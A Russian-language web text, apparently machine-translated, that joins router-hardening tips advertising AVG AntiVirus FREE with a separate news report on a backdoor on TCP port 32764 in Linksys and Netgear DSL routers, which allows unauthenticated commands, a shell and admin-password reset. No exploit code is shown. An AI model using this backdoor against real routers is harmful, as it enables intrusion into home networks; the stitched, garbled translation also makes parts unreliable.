Создайте новый пароль и для своего маршрутизатора — не используйте его повторно из другой учетной записи.Некоторые уязвимости маршрутизатора могут привести к утечке вашего пароля, и вы не хотите, чтобы хакер получил ключи от ваших финансовых аккаунтов, электронной почты или социальных сетей.

Отключить настройки удаленного доступа

Можете ли вы придумать причину, по которой вам нужно войти в настройки администратора вашего маршрутизатора, когда вы физически не находитесь рядом с ним? В противном случае нет причин оставлять это окно открытым для других. Убедитесь, что удаленный доступ отключен. , чтобы вы могли войти в свой маршрутизатор только с помощью старого доброго кабеля Ethernet или через сеть Wi-Fi.

Контролируйте свою сеть Wi-Fi с помощью инструмента кибербезопасности

Мониторинг вашего Wi-Fi поможет вам узнать, получили ли и когда какие-либо незнакомые устройства доступ к вашей сети — возможный признак взлома маршрутизатора. AVG AntiVirus FREE включает встроенный Network Inspector , который сканирует вашу сеть на предмет нераспознанных устройств и известных уязвимостей, таких как слабые пароли Wi-Fi или признаки перехвата DNS.

AVG AntiVirus FREE сканирует вашу сеть на наличие уязвимостей, которые могут стать причиной взлома.

Благодаря AVG AntiVirus FREE, защищающему вашу сеть Wi-Fi, вы будете первым, кто узнает о взломе вашего маршрутизатора. Это лишь один из многих способов, с помощью которых AVG AntiVirus FREE защитит вас в Интернете. защитит вас не только от хакеров, но и от вредоносных программ, фишинга и всевозможных других угроз.

Выбираю поддержку WPA3

WPA3 — это последняя версия протокола безопасности защищенного доступа Wi-Fi , который защищает вашу сеть Wi-Fi с помощью шифрования AES — кстати, это то же самое высокоуровневое шифрование, которое мы используем для нашей AVG Secure VPN.В старых роутерах не будет WPA3, но, скорее всего, будет WPA2. Это предыдущая версия, но все еще хорошая.

И помните, опять же, всегда создает надежный и уникальный пароль при настройке параметров WPA3 или WPA2.

Ditch WPS

WPA3 и его предшественник WPA2 надежно защищены — конечно, в зависимости от вашего пароля — но мы не можем сказать то же самое о WPS (Wi-Fi Protected Setup). Позволяя подключать устройство, нажав кнопку или введя PIN-код, WPS, безусловно, удобен, но отнюдь не безопасен.

Хакеру понадобится меньше времени, чтобы взломать короткий PIN-код, чем взломать ваш надежный и уникальный пароль. А если у вас есть кнопка WPS, это означает, что любой, кто находится рядом с вашим маршрутизатором, может подключиться к нему за считанные секунды.

Если ваш маршрутизатор позволяет это, полностью отключите WPS, и вместо этого защитите свой маршрутизатор паролем WPA3 или WPA2.

Измените сетевое имя маршрутизатора (SSID)

Оставить SSID по умолчанию (имя вашей сети Wi-Fi) на месте — это благо для потенциального хакера маршрутизатора, поскольку он позволяет им узнать, какой тип маршрутизатора у вас есть.Вместо этого, как только вы закончите изменять учетные данные маршрутизатора, также установит новый SSID . Более длинные и сложные имена лучше, потому что они также повышают вашу безопасность WPA.

И, конечно же, создаст длинный и уникальный сетевой пароль . Выбирайте пароль длиной от 15 до 20 символов. Чем длиннее ваш пароль, тем сложнее его взломать.

Обновите роутер (и его прошивку)

Если вы используете старый маршрутизатор, который как минимум не поддерживает WPA2, вам следует выполнить обновление.Старое оборудование более уязвимо для взлома, и вы будете в большей безопасности с более современной моделью маршрутизатора . Если вы покупаете подержанный маршрутизатор, измените пароль администратора, SSID и сетевой пароль как можно скорее.

То же самое и с прошивкой вашего роутера. Периодически проверяйте веб-сайт производителя вашего маршрутизатора, чтобы узнать, доступно ли обновление прошивки. Если да, обновите его. Это может помешать хакерам использовать уязвимости в старых версиях прошивки. Обновление вашего маршрутизатора также является отличным способом усилить слабый сигнал Wi-Fi дома.

Настроить межсетевой экран маршрутизатора

Брандмауэр — это интернет-блокировка, изолирующая вашу сеть от нежелательного трафика. При использовании простого брандмауэра маршрутизатора только соединения, запрошенные вашими устройствами, могут проходить через ваш маршрутизатор. Многие маршрутизаторы уже оснащены встроенным межсетевым экраном , поэтому все, что вам нужно сделать, это включить его в настройках администратора вашего маршрутизатора.

При активированном брандмауэре маршрутизатора ваша сеть будет защищена от нежелательного и потенциально вредоносного интернет-трафика.

Защитите свою сеть с помощью антивируса AVG

Лучший способ защитить вашу сеть Wi-Fi и защитить маршрутизаторы от хакеров — это инструмент для обеспечения безопасности сети мирового класса . AVG AntiVirus FREE защищает ваш компьютер и телефон от вредоносных программ, фишинга и т. Д. — и также будут отслеживать вашу сеть на предмет любых подозрительных действий, которые могут произойти в случае взлома маршрутизатора.

Если хакер установил какое-либо вредоносное ПО на ваши устройства, AVG AntiVirus FREE обнаружит и немедленно удалит его.А благодаря встроенному Network Inspector вы всегда будете знать, если в вашей сети происходит что-нибудь странное.

Backdoor в беспроводных маршрутизаторах DSL позволяет злоумышленнику сбросить маршрутизатор, получить администратора

Элои Вандербекен объясняет мотивы взлома собственного WiFi-роутера в картинках.

Элои Вандербекен

Хакер обнаружил бэкдор к комбинированному беспроводному маршрутизатору / модемам DSL, который может позволить злоумышленнику сбросить конфигурацию маршрутизатора и получить доступ к административной панели управления.Атака, которая, как подтверждено, работает на нескольких модемах Linksys и Netgear DSL, использует открытый порт, доступный по беспроводной локальной сети.

Бэкдор требует, чтобы злоумышленник находился в локальной сети, поэтому его нельзя использовать для удаленной атаки пользователей DSL. Однако его можно использовать для захвата точки беспроводного доступа и предоставления злоумышленнику беспрепятственного доступа к ресурсам локальной сети. Обновление : Вандербекен сообщает, что у некоторых маршрутизаторов есть бэкдор, открытый и со стороны Интернета, что делает их уязвимыми для удаленных атак.

Элои Вандербекен описал бэкдор в PowerPoint, опубликованном с кодом на Github. В своем иллюстрированном отчете он объяснил, как во время рождественских праздников он пытался получить доступ к административной консоли беспроводного DSL-шлюза Linksys WAG200G своей семьи — в основном для того, чтобы ограничить полосу пропускания, которую используют другие в доме. Но Вандербекен ранее отключил беспроводной доступ к административной веб-консоли (и забыл свой административный пароль).

Выполняя сканирование, он обнаружил, что маршрутизатор отвечает на сообщения через необычный номер порта TCP: 32764. Поиск в Интернете обнаружил, что другие маршрутизаторы Linksys и Netgear нашли ту же службу, но не было документации о том, что она делает.

Итак, Вандербекен загрузил копию прошивки Linksys и начал обратное проектирование двоичного кода MIPS. Он обнаружил простой интерфейс, который позволял ему отправлять команды на маршрутизатор без аутентификации в качестве администратора.При первой попытке перебора интерфейса маршрутизатор вернул свою конфигурацию к заводским настройкам, в результате чего все члены его семьи одновременно потеряли доступ к Интернету.

После дополнительного тестирования Вандербекен обнаружил, что интерфейс позволяет ему выполнять ряд команд непосредственно на маршрутизаторе, включая оболочку командной строки. Используя обнаруженные им команды, он смог написать скрипт, который позволил ему включить беспроводной доступ к администрированию и сбросить веб-пароль, и опубликовал скрипт (с его карикатурным отчетом о бэкдоре) на Github.

Увеличить / Код скрипта Вандербекена для получения беспроводного доступа к административной консоли DSL-роутеров с бэкдором.

Вскоре появились подтверждения того, что бэкдор работает с другими моделями беспроводных DSL-модемов Linksys и Netgear. Комментатор Hacker News отметил, что бэкдор может повлиять на беспроводные маршрутизаторы с DSL-модемами от SerComm, которая производила многие старые DSL-модемы Linksys.